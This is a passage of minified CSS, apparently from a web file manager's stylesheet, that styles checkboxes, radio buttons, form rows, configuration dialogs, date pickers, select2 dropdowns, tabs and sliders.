input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid 